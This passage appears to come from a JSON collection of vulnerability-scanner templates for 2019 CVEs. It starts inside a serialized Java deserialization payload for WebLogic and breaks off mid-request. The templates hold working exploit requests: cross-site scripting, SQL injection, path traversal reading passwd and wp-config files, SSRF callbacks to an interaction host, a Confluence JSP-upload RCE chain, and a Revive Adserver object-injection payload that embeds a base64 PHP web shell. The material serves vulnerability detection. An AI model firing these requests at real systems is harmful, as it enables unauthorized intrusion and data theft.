index=\"3133\"><byte>97</byte></void><void index=\"3134\"><byte>46</byte></void><void index=\"3135\"><byte>108</byte></void><void index=\"3136\"><byte>97</byte></void><void index=\"3137\"><byte>110</byte></void><void index=\"3138\"><byte>103</byte></void><void index=\"3139\"><byte>46</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>101</byte></void><void index=\"3142\"><byte>102</byte></void><void index=\"3143\"><byte>108</byte></void><void index=\"3144\"><byte>101</byte></void><void index=\"3145\"><byte>99</byte></void><void index=\"3146\"><byte>116</byte></void><void index=\"3147\"><byte>46</byte></void><void index=\"3148\"><byte>80</byte></void><void index=\"3149\"><byte>114</byte></void><void index=\"3150\"><byte>111</byte></void><void index=\"3151\"><byte>120</byte></void><void index=\"3152\"><byte>121</byte></void><void index=\"3153\"><byte>-31</byte></void><void index=\"3154\"><byte>39</byte></void><void index=\"3155\"><byte>-38</byte></void><void index=\"3156\"><byte>32</byte></void><void index=\"3157\"><byte>-52</byte></void><void index=\"3158\"><byte>16</byte></void><void index=\"3159\"><byte>67</byte></void><void index=\"3160\"><byte>-53</byte></void><void index=\"3161\"><byte>2</byte></void><void index=\"3162\"><byte>0</byte></void><void index=\"3163\"><byte>1</byte></void><void index=\"3164\"><byte>76</byte></void><void index=\"3165\"><byte>0</byte></void><void index=\"3166\"><byte>1</byte></void><void index=\"3167\"><byte>104</byte></void><void index=\"3168\"><byte>116</byte></void><void index=\"3169\"><byte>0</byte></void><void index=\"3170\"><byte>37</byte></void><void index=\"3171\"><byte>76</byte></void><void index=\"3172\"><byte>106</byte></void><void index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14696","info":{"name":"Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11869","info":{"name":"WordPress Yuzo <5.12.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nyuzo_related_post_css_and_style=</style><script>alert(0);</script>\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"<script>alert(0);</script>\")"]},{"type":"dsl","dsl":["contains(tolower(header_2), 'text/html')"]}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-3799","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6799","info":{"name":"phpMyAdmin <4.8.5 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["/index.php","/pma/index.php","/pmd/index.php","/phpMyAdmin/index.php","/phpmyadmin/index.php","/_phpmyadmin/index.php"]},"attack":"batteringram","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 4.8.5')"]},{"type":"dsl","dsl":["compare_versions(version, '> 3.9.9')"]},{"type":"dsl","dsl":["compare_versions(phpversion, '< 7.3.4')"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","words":["mysqli_real_connect"]},{"type":"word","words":["pma_servername"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\\?v=([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["\\?v=([0-9.]+)"]},{"type":"regex","name":"phpversion","group":1,"regex":["X-Powered-By: PHP/([0-9.]+)"],"internal":true,"part":"header"}]}]},{"id":"CVE-2019-16996","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["1918835981"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-19908","info":{"name":"phpMyChat-Plus 1.98 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username = \"</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> 